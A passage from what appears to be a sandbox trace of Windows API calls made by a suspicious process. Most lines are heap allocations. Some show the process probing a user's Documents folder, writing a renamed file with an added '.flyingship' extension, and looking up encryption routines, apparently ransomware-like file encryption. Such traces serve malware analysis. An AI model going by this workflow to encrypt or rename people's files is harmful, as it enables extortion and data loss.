hHeap=0x8a0000) returned 1 [0176.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0176.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0176.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0176.668] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0176.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0176.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0176.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0176.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0176.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0176.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0176.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.668] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.flyingship.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ukjh6aaskg.flyingship.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0176.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0176.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0176.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0176.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0176.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0176.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0176.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0176.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0176.675] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0176.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0176.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0176.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0176.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0176.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0176.676] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0176.676] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0176.676] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0176.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0176.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0176.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0176.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0176.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0176.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0176.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0176.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0176.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0176.677] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0176.677] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0176.681] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x3c5c, lpOverlapped=0x0) returned 1 [0176.682] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0176.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0176.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0176.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x13c5c) returned 0xbea018 [0176.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0176.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0176.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0176.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0176.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0176.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0176.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x13c5c) returned 0xa5f008 [0176.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0176.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.686] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0176.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0176.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x13c5c) returned 0xbea018 [0176.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0176.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0176.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0176.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.686] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0176.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0176.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0176.687] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0176.687] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0176.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0176.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x13c5c) returned 0xbea018 [0176.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0176.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0176.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0176.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2628 [0176.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0176.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0176.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0176.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0176.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0176.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0176.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0176.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0176.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0176.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x13c5c) returned 0xa72c70 [0176.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0176.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0176.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0176.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0176.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0176.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0176.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0176.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0176.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0176.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0176.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0176.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0176.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0176.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0176.689] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0176.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0176.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0176.690] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0176.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0176.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0176.690] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0176.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0176.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0176.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0176.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0176.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0176.691] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0176.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0176.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0176.691] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0176.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0176.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0176.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0176.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0176.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0176.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0176.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0176.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0176.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0176.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0176.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0176.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0176.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0176.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0176.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0176.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0176.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0176.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0176.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0176.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0176.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0176.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0176.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0176.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.693] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0176.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0176.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0176.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0176.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0176.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0176.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0176.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0176.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0176.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 